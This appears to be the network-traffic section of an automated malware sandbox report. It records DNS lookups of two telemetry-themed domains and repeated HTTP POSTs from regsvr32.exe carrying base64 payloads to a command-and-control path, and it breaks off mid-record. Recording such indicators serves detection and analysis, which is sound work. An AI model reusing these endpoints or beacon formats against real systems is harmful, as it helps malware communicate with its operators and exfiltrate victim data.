Jun 16, 2022 20:23:01.300470114 CEST	49182	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:23:12.015892982 CEST	49182	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:23:12.916872025 CEST	49182	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:23:19.194772005 CEST	49182	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:23:19.194843054 CEST	443	49182	213.226.114.15	192.168.2.22
Jun 16, 2022 20:23:20.363603115 CEST	49183	48195	192.168.2.22	213.226.114.15
Jun 16, 2022 20:23:20.423789024 CEST	48195	49183	213.226.114.15	192.168.2.22
Jun 16, 2022 20:23:20.425091982 CEST	49183	48195	192.168.2.22	213.226.114.15
Jun 16, 2022 20:23:20.427598953 CEST	49183	48195	192.168.2.22	213.226.114.15
Jun 16, 2022 20:23:20.529448986 CEST	48195	49183	213.226.114.15	192.168.2.22
Jun 16, 2022 20:23:20.673146009 CEST	48195	49183	213.226.114.15	192.168.2.22
Jun 16, 2022 20:23:20.673261881 CEST	48195	49183	213.226.114.15	192.168.2.22
Jun 16, 2022 20:23:20.675622940 CEST	49183	48195	192.168.2.22	213.226.114.15
Jun 16, 2022 20:23:20.676260948 CEST	49183	48195	192.168.2.22	213.226.114.15
Jun 16, 2022 20:23:20.735703945 CEST	49184	48195	192.168.2.22	213.226.114.15
Jun 16, 2022 20:23:20.736182928 CEST	48195	49183	213.226.114.15	192.168.2.22
Jun 16, 2022 20:23:20.796930075 CEST	48195	49184	213.226.114.15	192.168.2.22
Jun 16, 2022 20:23:20.808183908 CEST	49184	48195	192.168.2.22	213.226.114.15
Jun 16, 2022 20:23:20.808454037 CEST	49184	48195	192.168.2.22	213.226.114.15
Jun 16, 2022 20:23:20.911396980 CEST	48195	49184	213.226.114.15	192.168.2.22
Jun 16, 2022 20:23:21.018702984 CEST	48195	49184	213.226.114.15	192.168.2.22
Jun 16, 2022 20:23:21.018762112 CEST	48195	49184	213.226.114.15	192.168.2.22
Jun 16, 2022 20:23:21.022171021 CEST	49184	48195	192.168.2.22	213.226.114.15
Jun 16, 2022 20:23:21.022241116 CEST	49184	48195	192.168.2.22	213.226.114.15
Jun 16, 2022 20:23:21.083259106 CEST	48195	49184	213.226.114.15	192.168.2.22
Jun 16, 2022 20:23:22.725147009 CEST	49185	48195	192.168.2.22	213.226.114.15
Jun 16, 2022 20:23:22.786169052 CEST	48195	49185	213.226.114.15	192.168.2.22
Jun 16, 2022 20:23:22.786329985 CEST	49185	48195	192.168.2.22	213.226.114.15
Jun 16, 2022 20:23:22.787939072 CEST	49185	48195	192.168.2.22	213.226.114.15
Jun 16, 2022 20:23:22.890367031 CEST	48195	49185	213.226.114.15	192.168.2.22
Jun 16, 2022 20:23:23.016506910 CEST	48195	49185	213.226.114.15	192.168.2.22
Jun 16, 2022 20:23:23.016577959 CEST	48195	49185	213.226.114.15	192.168.2.22
Jun 16, 2022 20:23:23.016623020 CEST	49185	48195	192.168.2.22	213.226.114.15
Jun 16, 2022 20:23:23.016659021 CEST	49185	48195	192.168.2.22	213.226.114.15
Jun 16, 2022 20:23:23.077893019 CEST	48195	49185	213.226.114.15	192.168.2.22
Jun 16, 2022 20:23:23.179160118 CEST	49186	48195	192.168.2.22	213.226.114.15
Jun 16, 2022 20:23:23.239500999 CEST	48195	49186	213.226.114.15	192.168.2.22
Jun 16, 2022 20:23:23.239612103 CEST	49186	48195	192.168.2.22	213.226.114.15
Jun 16, 2022 20:23:23.239768982 CEST	49186	48195	192.168.2.22	213.226.114.15
Jun 16, 2022 20:23:23.342339993 CEST	48195	49186	213.226.114.15	192.168.2.22
Jun 16, 2022 20:23:23.483053923 CEST	48195	49186	213.226.114.15	192.168.2.22
Jun 16, 2022 20:23:23.483164072 CEST	49186	48195	192.168.2.22	213.226.114.15
Jun 16, 2022 20:23:23.483316898 CEST	49186	48195	192.168.2.22	213.226.114.15
Jun 16, 2022 20:23:23.543207884 CEST	48195	49186	213.226.114.15	192.168.2.22
Jun 16, 2022 20:23:23.769932032 CEST	49187	48195	192.168.2.22	213.226.114.15
Jun 16, 2022 20:23:23.831312895 CEST	48195	49187	213.226.114.15	192.168.2.22
Jun 16, 2022 20:23:23.840336084 CEST	49187	48195	192.168.2.22	213.226.114.15
Jun 16, 2022 20:23:23.840523005 CEST	49187	48195	192.168.2.22	213.226.114.15
Jun 16, 2022 20:23:23.943547964 CEST	48195	49187	213.226.114.15	192.168.2.22
Jun 16, 2022 20:23:24.060791016 CEST	48195	49187	213.226.114.15	192.168.2.22
Jun 16, 2022 20:23:24.060971022 CEST	49187	48195	192.168.2.22	213.226.114.15
Jun 16, 2022 20:23:24.061028004 CEST	49187	48195	192.168.2.22	213.226.114.15
Jun 16, 2022 20:23:24.122312069 CEST	48195	49187	213.226.114.15	192.168.2.22
Jun 16, 2022 20:23:24.247910976 CEST	49188	48195	192.168.2.22	213.226.114.15
Jun 16, 2022 20:23:24.310300112 CEST	48195	49188	213.226.114.15	192.168.2.22
Jun 16, 2022 20:23:24.310519934 CEST	49188	48195	192.168.2.22	213.226.114.15
Jun 16, 2022 20:23:24.343971014 CEST	49188	48195	192.168.2.22	213.226.114.15
Jun 16, 2022 20:23:24.447556019 CEST	48195	49188	213.226.114.15	192.168.2.22
Jun 16, 2022 20:23:24.575650930 CEST	48195	49188	213.226.114.15	192.168.2.22
Jun 16, 2022 20:23:24.575697899 CEST	48195	49188	213.226.114.15	192.168.2.22
Jun 16, 2022 20:23:24.575961113 CEST	49188	48195	192.168.2.22	213.226.114.15
Jun 16, 2022 20:23:24.638155937 CEST	48195	49188	213.226.114.15	192.168.2.22
Jun 16, 2022 20:23:24.744018078 CEST	49189	48195	192.168.2.22	213.226.114.15
Jun 16, 2022 20:23:24.807528019 CEST	48195	49189	213.226.114.15	192.168.2.22
Jun 16, 2022 20:23:24.807724953 CEST	49189	48195	192.168.2.22	213.226.114.15
Jun 16, 2022 20:23:24.808119059 CEST	49189	48195	192.168.2.22	213.226.114.15
Jun 16, 2022 20:23:24.911393881 CEST	48195	49189	213.226.114.15	192.168.2.22
Jun 16, 2022 20:23:25.010498047 CEST	48195	49189	213.226.114.15	192.168.2.22
Jun 16, 2022 20:23:25.011450052 CEST	49189	48195	192.168.2.22	213.226.114.15
Jun 16, 2022 20:23:25.011497021 CEST	49189	48195	192.168.2.22	213.226.114.15
Jun 16, 2022 20:23:25.073581934 CEST	48195	49189	213.226.114.15	192.168.2.22
Jun 16, 2022 20:23:25.202507019 CEST	49190	48195	192.168.2.22	213.226.114.15
Jun 16, 2022 20:23:25.267482996 CEST	48195	49190	213.226.114.15	192.168.2.22
Jun 16, 2022 20:23:25.267652035 CEST	49190	48195	192.168.2.22	213.226.114.15
Jun 16, 2022 20:23:25.267841101 CEST	49190	48195	192.168.2.22	213.226.114.15
Jun 16, 2022 20:23:25.373492002 CEST	48195	49190	213.226.114.15	192.168.2.22
Jun 16, 2022 20:23:25.501609087 CEST	48195	49190	213.226.114.15	192.168.2.22
Jun 16, 2022 20:23:25.501652956 CEST	48195	49190	213.226.114.15	192.168.2.22
Jun 16, 2022 20:23:25.501718044 CEST	49190	48195	192.168.2.22	213.226.114.15
Jun 16, 2022 20:23:25.501760960 CEST	49190	48195	192.168.2.22	213.226.114.15
Jun 16, 2022 20:23:25.563998938 CEST	48195	49190	213.226.114.15	192.168.2.22

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 16, 2022 20:22:56.901199102 CEST	59915	53	192.168.2.22	8.8.8.8
Jun 16, 2022 20:22:56.920978069 CEST	53	59915	8.8.8.8	192.168.2.22
Jun 16, 2022 20:23:20.003211975 CEST	54408	53	192.168.2.22	8.8.8.8
Jun 16, 2022 20:23:20.291132927 CEST	53	54408	8.8.8.8	192.168.2.22
Jun 16, 2022 20:23:20.714782000 CEST	50108	53	192.168.2.22	8.8.8.8
Jun 16, 2022 20:23:20.734549046 CEST	53	50108	8.8.8.8	192.168.2.22
Jun 16, 2022 20:23:22.704845905 CEST	54723	53	192.168.2.22	8.8.8.8
Jun 16, 2022 20:23:22.724283934 CEST	53	54723	8.8.8.8	192.168.2.22
Jun 16, 2022 20:23:23.158436060 CEST	58062	53	192.168.2.22	8.8.8.8
Jun 16, 2022 20:23:23.177994967 CEST	53	58062	8.8.8.8	192.168.2.22
Jun 16, 2022 20:23:23.661021948 CEST	56703	53	192.168.2.22	8.8.8.8
Jun 16, 2022 20:23:23.768510103 CEST	53	56703	8.8.8.8	192.168.2.22
Jun 16, 2022 20:23:24.229526997 CEST	59241	53	192.168.2.22	8.8.8.8
Jun 16, 2022 20:23:24.247152090 CEST	53	59241	8.8.8.8	192.168.2.22
Jun 16, 2022 20:23:24.720599890 CEST	55244	53	192.168.2.22	8.8.8.8
Jun 16, 2022 20:23:24.739763021 CEST	53	55244	8.8.8.8	192.168.2.22
Jun 16, 2022 20:23:25.182858944 CEST	53958	53	192.168.2.22	8.8.8.8
Jun 16, 2022 20:23:25.201725960 CEST	53	53958	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jun 16, 2022 20:22:56.901199102 CEST	192.168.2.22	8.8.8.8	0x394	Standard query (0)	telemetrysystemcollection.com	A (IP address)	IN (0x0001)
Jun 16, 2022 20:23:20.003211975 CEST	192.168.2.22	8.8.8.8	0xdee1	Standard query (0)	collectiontelemetrysystem.com	A (IP address)	IN (0x0001)
Jun 16, 2022 20:23:20.714782000 CEST	192.168.2.22	8.8.8.8	0x19b5	Standard query (0)	collectiontelemetrysystem.com	A (IP address)	IN (0x0001)
Jun 16, 2022 20:23:22.704845905 CEST	192.168.2.22	8.8.8.8	0xa93b	Standard query (0)	collectiontelemetrysystem.com	A (IP address)	IN (0x0001)
Jun 16, 2022 20:23:23.158436060 CEST	192.168.2.22	8.8.8.8	0xd736	Standard query (0)	collectiontelemetrysystem.com	A (IP address)	IN (0x0001)
Jun 16, 2022 20:23:23.661021948 CEST	192.168.2.22	8.8.8.8	0x5eba	Standard query (0)	collectiontelemetrysystem.com	A (IP address)	IN (0x0001)
Jun 16, 2022 20:23:24.229526997 CEST	192.168.2.22	8.8.8.8	0x47e4	Standard query (0)	collectiontelemetrysystem.com	A (IP address)	IN (0x0001)
Jun 16, 2022 20:23:24.720599890 CEST	192.168.2.22	8.8.8.8	0xfb7f	Standard query (0)	collectiontelemetrysystem.com	A (IP address)	IN (0x0001)
Jun 16, 2022 20:23:25.182858944 CEST	192.168.2.22	8.8.8.8	0x40f5	Standard query (0)	collectiontelemetrysystem.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Jun 16, 2022 20:22:56.920978069 CEST	8.8.8.8	192.168.2.22	0x394	No error (0)	telemetrysystemcollection.com	213.226.114.15	A (IP address)	IN (0x0001)
Jun 16, 2022 20:23:20.291132927 CEST	8.8.8.8	192.168.2.22	0xdee1	No error (0)	collectiontelemetrysystem.com	213.226.114.15	A (IP address)	IN (0x0001)
Jun 16, 2022 20:23:20.734549046 CEST	8.8.8.8	192.168.2.22	0x19b5	No error (0)	collectiontelemetrysystem.com	213.226.114.15	A (IP address)	IN (0x0001)
Jun 16, 2022 20:23:22.724283934 CEST	8.8.8.8	192.168.2.22	0xa93b	No error (0)	collectiontelemetrysystem.com	213.226.114.15	A (IP address)	IN (0x0001)
Jun 16, 2022 20:23:23.177994967 CEST	8.8.8.8	192.168.2.22	0xd736	No error (0)	collectiontelemetrysystem.com	213.226.114.15	A (IP address)	IN (0x0001)
Jun 16, 2022 20:23:23.768510103 CEST	8.8.8.8	192.168.2.22	0x5eba	No error (0)	collectiontelemetrysystem.com	213.226.114.15	A (IP address)	IN (0x0001)
Jun 16, 2022 20:23:24.247152090 CEST	8.8.8.8	192.168.2.22	0x47e4	No error (0)	collectiontelemetrysystem.com	213.226.114.15	A (IP address)	IN (0x0001)
Jun 16, 2022 20:23:24.739763021 CEST	8.8.8.8	192.168.2.22	0xfb7f	No error (0)	collectiontelemetrysystem.com	213.226.114.15	A (IP address)	IN (0x0001)
Jun 16, 2022 20:23:25.201725960 CEST	8.8.8.8	192.168.2.22	0x40f5	No error (0)	collectiontelemetrysystem.com	213.226.114.15	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

telemetrysystemcollection.com

collectiontelemetrysystem.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49180	213.226.114.15	443	C:\Windows\SysWOW64\regsvr32.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.22	49182	213.226.114.15	443	C:\Windows\SysWOW64\regsvr32.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.22	49183	213.226.114.15	48195	C:\Windows\SysWOW64\regsvr32.exe

Timestamp	kBytes transferred	Direction	Data
Jun 16, 2022 20:23:20.427598953 CEST	1259	OUT	POST /cAUtfkUDaptk/ZRSeiy/requets/index.php HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Microsoft Outlook 16.0.5197; ms-office; MSOffice 16) Host: collectiontelemetrysystem.com Content-Length: 563 Content-Type: application/x-www-form-urlencoded Accept-Language: en-RUS Data Raw: 65 76 3d 65 79 49 7a 51 30 56 72 49 6a 6f 69 4d 48 68 78 51 55 5a 4d 64 6b 52 79 52 56 4e 59 64 33 4e 50 64 7a 51 77 52 33 42 6e 62 45 55 31 51 30 51 79 4f 58 70 4f 56 30 64 69 54 30 31 4d 54 31 4e 52 4d 58 64 4c 53 6e 42 6c 59 79 74 4d 53 58 67 77 50 53 49 73 49 6a 4e 6d 5a 54 45 78 49 6a 6f 69 62 32 74 59 54 6c 46 42 50 54 30 69 4c 43 49 7a 62 54 64 34 49 6a 6f 69 4d 6e 68 44 57 6b 64 4d 61 7a 30 69 4c 43 4a 45 55 7a 4a 34 49 6a 6f 69 63 6b 56 45 56 55 30 33 4e 6d 59 69 4c 43 4a 46 54 47 6f 69 4f 69 49 7a 61 6c 63 32 55 57 56 4e 50 53 49 73 49 6b 56 76 4e 69 49 36 49 6a 4a 34 54 30 64 48 54 45 74 49 49 69 77 69 52 6e 52 76 49 6a 6f 69 63 6d 63 39 50 53 49 73 49 6b 78 76 63 79 49 36 57 79 49 76 51 58 6c 46 52 6e 41 79 51 6e 52 70 4e 33 64 34 59 31 64 7a 4e 6c 59 79 54 57 31 33 53 6b 46 56 56 54 4e 56 63 6d 39 50 52 45 6c 4a 56 6e 70 6b 51 54 6c 48 64 6e 56 4e 54 6b 6c 6e 50 54 30 69 58 53 77 69 54 6c 4e 6c 65 55 52 59 49 6a 6f 69 4d 55 4e 6c 55 6b 4e 4b 54 33 6f 69 4c 43 4a 52 4e 6c 67 32 49 6a 6f 69 4d 6e 70 70 4d 6b 70 4a 56 45 64 79 61 54 51 39 49 69 77 69 56 6e 6f 69 4f 69 49 79 56 54 5a 76 53 6e 49 32 52 6d 31 6e 54 45 45 34 64 6b 4e 53 4c 33 68 78 63 57 64 44 4f 44 6c 49 51 30 74 6d 4c 30 70 4d 52 45 78 4c 52 55 6c 4c 4d 48 42 33 61 58 56 72 50 53 49 73 49 6d 4e 43 52 69 49 36 49 6a 4e 36 5a 6c 70 4f 4b 31 42 48 64 6b 4d 72 59 58 63 31 62 6e 5a 32 4d 57 70 52 4b 32 70 76 50 53 49 73 49 6d 59 78 5a 47 45 69 4f 69 4a 34 61 57 6b 78 55 46 70 58 4b 33 4a 56 52 47 35 33 5a 7a 30 39 49 69 77 69 64 46 63 69 4f 69 4a 78 61 30 78 47 55 6b 39 51 5a 69 49 73 49 6e 64 51 4e 69 49 36 49 6a 64 46 57 47 46 53 5a 6d 35 69 49 69 77 69 65 6d 74 44 4e 79 49 36 49 69 4a 39 Data Ascii: ev=eyIzQ0VrIjoiMHhxQUZMdkRyRVNYd3NPdzQwR3BnbEU1Q0QyOXpOV0diT01MT1NRMXdLSnBlYytMSXgwPSIsIjNmZTExIjoib2tYTlFBPT0iLCIzbTd4IjoiMnhDWkdMaz0iLCJEUzJ4IjoickVEVU03NmYiLCJFTGoiOiIzalc2UWVNPSIsIkVvNiI6IjJ4T0dHTEtIIiwiRnRvIjoicmc9PSIsIkxvcyI6WyIvQXlFRnAyQnRpN3d4Y1dzNlYyTW13SkFVVTNVcm9PRElJVnpkQTlHdnVNTklnPT0iXSwiTlNleURYIjoiMUNlUkNKT3oiLCJRNlg2IjoiMnppMkpJVEdyaTQ9IiwiVnoiOiIyVTZvSnI2Rm1nTEE4dkNSL3hxcWdDODlIQ0tmL0pMRExLRUlLMHB3aXVrPSIsImNCRiI6IjN6ZlpOK1BHdkMrYXc1bnZ2MWpRK2pvPSIsImYxZGEiOiJ4aWkxUFpXK3JVRG53Zz09IiwidFciOiJxa0xGUk9QZiIsIndQNiI6IjdFWGFSZm5iIiwiemtDNyI6IiJ9
Jun 16, 2022 20:23:20.673146009 CEST	1259	IN	HTTP/1.1 200 OK Date: Thu, 16 Jun 2022 18:23:20 GMT Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.4 X-Powered-By: PHP/8.1.4 Content-Length: 20 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 48 63 43 49 36 49 6e 70 42 59 7a 30 69 66 51 3d 3d Data Ascii: eyJHcCI6InpBYz0ifQ==

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.22	49184	213.226.114.15	48195	C:\Windows\SysWOW64\regsvr32.exe

Timestamp	kBytes transferred	Direction	Data
Jun 16, 2022 20:23:20.808454037 CEST	1260	OUT	POST /cAUtfkUDaptk/ZRSeiy/requets/index.php HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Microsoft Outlook 16.0.5197; ms-office; MSOffice 16) Host: collectiontelemetrysystem.com Content-Length: 231 Content-Type: application/x-www-form-urlencoded Accept-Language: en-RUS Data Raw: 65 76 3d 65 79 49 7a 62 54 64 34 49 6a 6f 69 4d 6e 68 44 57 6b 64 4d 61 7a 30 69 4c 43 4a 4b 59 69 49 36 49 6a 64 42 55 31 4a 42 5a 7a 30 39 49 69 77 69 54 6c 4e 6c 65 55 52 59 49 6a 6f 69 4d 55 4e 6c 55 6b 4e 4b 54 33 6f 69 4c 43 4a 57 65 69 49 36 49 6a 4a 56 4e 6d 39 4b 63 6a 5a 47 62 57 64 4d 51 54 68 32 51 31 49 76 65 48 46 78 5a 30 4d 34 4f 55 68 44 53 32 59 76 53 6b 78 45 54 45 74 46 53 55 73 77 63 48 64 70 64 57 73 39 49 69 77 69 59 6b 34 69 4f 69 4a 36 51 57 4d 39 49 69 77 69 59 30 4a 47 49 6a 6f 69 4d 33 70 6d 57 6b 34 72 55 45 64 32 51 79 74 68 64 7a 56 75 64 6e 59 78 61 6c 45 72 61 6d 38 39 49 69 77 69 64 31 41 32 49 6a 6f 69 4e 30 56 59 59 56 4a 6d 62 6d 49 69 66 51 3d 3d Data Ascii: ev=eyIzbTd4IjoiMnhDWkdMaz0iLCJKYiI6IjdBU1JBZz09IiwiTlNleURYIjoiMUNlUkNKT3oiLCJWeiI6IjJVNm9KcjZGbWdMQTh2Q1IveHFxZ0M4OUhDS2YvSkxETEtFSUswcHdpdWs9IiwiYk4iOiJ6QWM9IiwiY0JGIjoiM3pmWk4rUEd2QythdzVudnYxalEram89Iiwid1A2IjoiN0VYYVJmbmIifQ==
Jun 16, 2022 20:23:21.018702984 CEST	1261	IN	HTTP/1.1 200 OK Date: Thu, 16 Jun 2022 18:23:20 GMT Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.4 X-Powered-By: PHP/8.1.4 Content-Length: 20 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 48 63 43 49 36 49 6e 70 42 59 7a 30 69 66 51 3d 3d Data Ascii: eyJHcCI6InpBYz0ifQ==

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.22	49185	213.226.114.15	48195	C:\Windows\SysWOW64\regsvr32.exe

Timestamp	kBytes transferred	Direction	Data
Jun 16, 2022 20:23:22.787939072 CEST	1262	OUT	POST /cAUtfkUDaptk/ZRSeiy/requets/index.php HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Microsoft Outlook 16.0.5197; ms-office; MSOffice 16) Host: collectiontelemetrysystem.com Content-Length: 231 Content-Type: application/x-www-form-urlencoded Accept-Language: en-RUS Data Raw: 65 76 3d 65 79 49 7a 62 54 64 34 49 6a 6f 69 4d 6e 68 44 57 6b 64 4d 61 7a 30 69 4c 43 4a 4b 59 69 49 36 49 6a 64 42 55 31 4a 42 5a 7a 30 39 49 69 77 69 54 6c 4e 6c 65 55 52 59 49 6a 6f 69 4d 55 4e 6c 55 6b 4e 4b 54 33 6f 69 4c 43 4a 57 65 69 49 36 49 6a 4a 56 4e 6d 39 4b 63 6a 5a 47 62 57 64 4d 51 54 68 32 51 31 49 76 65 48 46 78 5a 30 4d 34 4f 55 68 44 53 32 59 76 53 6b 78 45 54 45 74 46 53 55 73 77 63 48 64 70 64 57 73 39 49 69 77 69 59 6b 34 69 4f 69 4a 36 51 57 4d 39 49 69 77 69 59 30 4a 47 49 6a 6f 69 4d 33 70 6d 57 6b 34 72 55 45 64 32 51 79 74 68 64 7a 56 75 64 6e 59 78 61 6c 45 72 61 6d 38 39 49 69 77 69 64 31 41 32 49 6a 6f 69 4e 30 56 59 59 56 4a 6d 62 6d 49 69 66 51 3d 3d Data Ascii: ev=eyIzbTd4IjoiMnhDWkdMaz0iLCJKYiI6IjdBU1JBZz09IiwiTlNleURYIjoiMUNlUkNKT3oiLCJWeiI6IjJVNm9KcjZGbWdMQTh2Q1IveHFxZ0M4OUhDS2YvSkxETEtFSUswcHdpdWs9IiwiYk4iOiJ6QWM9IiwiY0JGIjoiM3pmWk4rUEd2QythdzVudnYxalEram89Iiwid1A2IjoiN0VYYVJmbmIifQ==
Jun 16, 2022 20:23:23.016506910 CEST	1262	IN	HTTP/1.1 200 OK Date: Thu, 16 Jun 2022 18:23:22 GMT Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.4 X-Powered-By: PHP/8.1.4 Content-Length: 20 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 48 63 43 49 36 49 6e 70 42 59 7a 30 69 66 51 3d 3d Data Ascii: eyJHcCI6InpBYz0ifQ==

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.22	49186	213.226.114.15	48195	C:\Windows\SysWOW64\regsvr32.exe

Timestamp	kBytes transferred	Direction	Data
Jun 16, 2022 20:23:23.239768982 CEST	1264	OUT	POST /cAUtfkUDaptk/ZRSeiy/requets/index.php HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Microsoft Outlook 16.0.5197; ms-office; MSOffice 16) Host: collectiontelemetrysystem.com Content-Length: 231 Content-Type: application/x-www-form-urlencoded Accept-Language: en-RUS Data Raw: 65 76 3d 65 79 49 7a 62 54 64 34 49 6a 6f 69 4d 6e 68 44 57 6b 64 4d 61 7a 30 69 4c 43 4a 4b 59 69 49 36 49 6a 64 42 55 31 4a 42 5a 7a 30 39 49 69 77 69 54 6c 4e 6c 65 55 52 59 49 6a 6f 69 4d 55 4e 6c 55 6b 4e 4b 54 33 6f 69 4c 43 4a 57 65 69 49 36 49 6a 4a 56 4e 6d 39 4b 63 6a 5a 47 62 57 64 4d 51 54 68 32 51 31 49 76 65 48 46 78 5a 30 4d 34 4f 55 68 44 53 32 59 76 53 6b 78 45 54 45 74 46 53 55 73 77 63 48 64 70 64 57 73 39 49 69 77 69 59 6b 34 69 4f 69 4a 36 51 57 4d 39 49 69 77 69 59 30 4a 47 49 6a 6f 69 4d 33 70 6d 57 6b 34 72 55 45 64 32 51 79 74 68 64 7a 56 75 64 6e 59 78 61 6c 45 72 61 6d 38 39 49 69 77 69 64 31 41 32 49 6a 6f 69 4e 30 56 59 59 56 4a 6d 62 6d 49 69 66 51 3d 3d Data Ascii: ev=eyIzbTd4IjoiMnhDWkdMaz0iLCJKYiI6IjdBU1JBZz09IiwiTlNleURYIjoiMUNlUkNKT3oiLCJWeiI6IjJVNm9KcjZGbWdMQTh2Q1IveHFxZ0M4OUhDS2YvSkxETEtFSUswcHdpdWs9IiwiYk4iOiJ6QWM9IiwiY0JGIjoiM3pmWk4rUEd2QythdzVudnYxalEram89Iiwid1A2IjoiN0VYYVJmbmIifQ==
Jun 16, 2022 20:23:23.483053923 CEST	1264	IN	HTTP/1.1 200 OK Date: Thu, 16 Jun 2022 18:23:23 GMT Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.4 X-Powered-By: PHP/8.1.4 Content-Length: 20 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 48 63 43 49 36 49 6e 70 42 59 7a 30 69 66 51 3d 3d Data Ascii: eyJHcCI6InpBYz0ifQ==

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.22	49187	213.226.114.15	48195	C:\Windows\SysWOW64\regsvr32.exe

Timestamp	kBytes transferred	Direction	Data
Jun 16, 2022 20:23:23.840523005 CEST	1265	OUT	POST /cAUtfkUDaptk/ZRSeiy/requets/index.php HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Microsoft Outlook 16.0.5197; ms-office; MSOffice 16) Host: collectiontelemetrysystem.com Content-Length: 231 Content-Type: application/x-www-form-urlencoded Accept-Language: en-RUS Data Raw: 65 76 3d 65 79 49 7a 62 54 64 34 49 6a 6f 69 4d 6e 68 44 57 6b 64 4d 61 7a 30 69 4c 43 4a 4b 59 69 49 36 49 6a 64 42 55 31 4a 42 5a 7a 30 39 49 69 77 69 54 6c 4e 6c 65 55 52 59 49 6a 6f 69 4d 55 4e 6c 55 6b 4e 4b 54 33 6f 69 4c 43 4a 57 65 69 49 36 49 6a 4a 56 4e 6d 39 4b 63 6a 5a 47 62 57 64 4d 51 54 68 32 51 31 49 76 65 48 46 78 5a 30 4d 34 4f 55 68 44 53 32 59 76 53 6b 78 45 54 45 74 46 53 55 73 77 63 48 64 70 64 57 73 39 49 69 77 69 59 6b 34 69 4f 69 4a 36 51 57 4d 39 49 69 77 69 59 30 4a 47 49 6a 6f 69 4d 33 70 6d 57 6b 34 72 55 45 64 32 51 79 74 68 64 7a 56 75 64 6e 59 78 61 6c 45 72 61 6d 38 39 49 69 77 69 64 31 41 32 49 6a 6f 69 4e 30 56 59 59 56 4a 6d 62 6d 49 69 66 51 3d 3d Data Ascii: ev=eyIzbTd4IjoiMnhDWkdMaz0iLCJKYiI6IjdBU1JBZz09IiwiTlNleURYIjoiMUNlUkNKT3oiLCJWeiI6IjJVNm9KcjZGbWdMQTh2Q1IveHFxZ0M4OUhDS2YvSkxETEtFSUswcHdpdWs9IiwiYk4iOiJ6QWM9IiwiY0JGIjoiM3pmWk4rUEd2QythdzVudnYxalEram89Iiwid1A2IjoiN0VYYVJmbmIifQ==
Jun 16, 2022 20:23:24.060791016 CEST	1266	IN	HTTP/1.1 200 OK Date: Thu, 16 Jun 2022 18:23:23 GMT Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.4 X-Powered-By: PHP/8.1.4 Content-Length: 20 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 48 63 43 49 36 49 6e 70 42 59 7a 30 69 66 51 3d 3d Data Ascii: eyJHcCI6InpBYz0ifQ==

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.22	49188	213.226.114.15	48195	C:\Windows\SysWOW64\regsvr32.exe

Timestamp	kBytes transferred	Direction	Data
Jun 16, 2022 20:23:24.343971014 CEST	1267	OUT	POST /cAUtfkUDaptk/ZRSeiy/requets/index.php HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Microsoft Outlook 16.0.5197; ms-office; MSOffice 16) Host: collectiontelemetrysystem.com Content-Length: 231 Content-Type: application/x-www-form-urlencoded Accept-Language: en-RUS Data Raw: 65 76 3d 65 79 49 7a 62 54 64 34 49 6a 6f 69 4d 6e 68 44 57 6b 64 4d 61 7a 30 69 4c 43 4a 4b 59 69 49 36 49 6a 64 42 55 31 4a 42 5a 7a 30 39 49 69 77 69 54 6c 4e 6c 65 55 52 59 49 6a 6f 69 4d 55 4e 6c 55 6b 4e 4b 54 33 6f 69 4c 43 4a 57 65 69 49 36 49 6a 4a 56 4e 6d 39 4b 63 6a 5a 47 62 57 64 4d 51 54 68 32 51 31 49 